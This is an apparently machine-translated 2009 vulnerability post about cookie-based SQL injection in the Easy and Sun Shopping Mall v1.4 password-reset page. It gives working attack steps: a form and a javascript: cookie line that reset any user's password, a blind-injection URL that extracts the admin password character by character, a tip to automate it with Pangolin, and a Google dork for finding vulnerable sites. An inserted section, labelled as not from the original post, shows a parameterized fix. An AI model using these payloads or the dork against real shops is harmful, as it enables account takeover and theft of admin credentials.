Easy and Sun Shopping Mall v1.4 Cookie injection vulnerability - vulnerability warning - the black bar safety net

2009-12-26T00:00:00
ID MYHACK58:62200925724
Type myhack58
Reporter Anonymous
Modified 2009-12-26T00:00:00

Description

Easy and Sun Shopping Mall v1.4 Cookie injection vulnerability. This injection vulnerability appears to be in the Home Shopping system, which looks like a "network fun" build. The problem is in the getpwd4.asp page. See the code:

<%
' Request() reads the name from the query string, form, cookies or server variables,
' and the value is concatenated straight into the SQL statement.
username = request("username")
passwd = md5(trim(request.form("passwd")), 16)
set rs = Server.CreateObject("Adodb.Recordset")
sql = "select * from bjx_User where username='" & username & "'"
rs.open sql, conn, 1, 3
If rs.eof Then
%>
<script language="javascript">
alert("this user has not registered yet, please go to home REGISTER now!")
location.href = "javascript:history.back()"
</script>

The system has anti-injection filtering; GET and POST we set aside for now, but the username is left open to cookie injection. While browsing around the tools section I also found this problem. To borrow a paragraph: the program's idea is to accept the variables submitted by the previous set-password form, but here we do not submit that form variable to it and instead let it accept the cookie we set; passwd is read with request.form, so that one we submit through the form.

Form content:

<form method="post" action="http://localhost/getpwd4.asp">
  <!-- Change the following 123456 to the new password -->
  <input name="passwd" type="text" id="receipt" size="12" value="123456">
  <input class="go-wenbenkuang" type="submit" value=" set password " name="submit">
</form>

First, the method to change any user's password: save the code above as a local htm file, taking care to change the target URL. Then open the page, clear the address bar and enter

javascript:alert(document.cookie="username="+escape("shaun"))

(the user must exist on the site). Open the local htm file and click Set Password; the page returns that the new password was set successfully. Otherwise it returns "this user has not registered, please register at the front desk".

Second, we take the injection further to get the admin account and password. The JS statement does not work for this; a relay is used to generate a dedicated injection page. Hand-guessing statement:

http://localhost/jmCook.asp?jmdcw=shaun'%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20bjx_admin)>54%20and%20'='

The digits 0-9 correspond to ASCII 48-57 and the letters a-z to 97-122. As shown in the figure, >54 returns normally,

while >55 returns an error, indicating that the first character of the password has ASCII value 55, i.e. the digit 7, and so on.

But hand-guessing like this is too slow, so a tool can be used, though it still requires generating the dedicated page first. Pangolin handles this character-type injection better. Add the table name bjx_admin manually.
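For contrast, an added example (not the vendor's code and not from the original post) of the same getpwd4.asp lookup written so that the cookie path described above is closed: the account name comes from server-side state rather than Request(), and the query is bound through ADODB.Command instead of concatenated. It assumes conn is the open ADODB.Connection the original snippet uses, keeps the bjx_User table and md5() helper from the page, and the Session key name "pwdreset_user" is an assumption.

```asp
<%
' Added hardened rewrite of the getpwd4.asp lookup shown above (example code, not the vendor's).
' Request("username") searches QueryString, Form, Cookies, ClientCertificate and
' ServerVariables in turn, which is why a cookie named username was accepted.
' Which account is being reset must come from server-side state established by the
' previous verification step, never from the client; the Session key "pwdreset_user"
' is an assumed name for this example.
Dim username, passwd, cmd, rs
username = Trim(Session("pwdreset_user") & "")
passwd   = md5(Trim(Request.Form("passwd")), 16)   ' md5() is the page's own helper

' Refuse to proceed without a verified account name or a non-empty new password.
If Len(username) = 0 Or Len(username) > 50 Or Len(Trim(Request.Form("passwd"))) = 0 Then
    Response.Write "invalid request"
    Response.End
End If

' Parameterized query: the value is bound, never spliced into the SQL text, so a
' quote inside the name is plain data and the >54 / >55 true-or-error oracle used
' above has nothing to act on. conn is the open ADODB.Connection from the original.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "select * from bjx_User where username = ?"
cmd.CommandType = 1                 ' adCmdText
' CreateParameter(Name, Type, Direction, Size, Value): 200 = adVarChar, 1 = adParamInput
cmd.Parameters.Append cmd.CreateParameter("username", 200, 1, 50, username)
Set rs = cmd.Execute

If rs.EOF Then
    Response.Write "this user has not registered yet, please go to home REGISTER now!"
    Response.End
End If
' ... update the password hash for rs("username") here, again through a bound parameter.
%>
```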

Google for: inurl:product.asp?Iheeoid=

This article is from San ㄗ Feng 訫 locks of love's Blog http://www.virusest.com/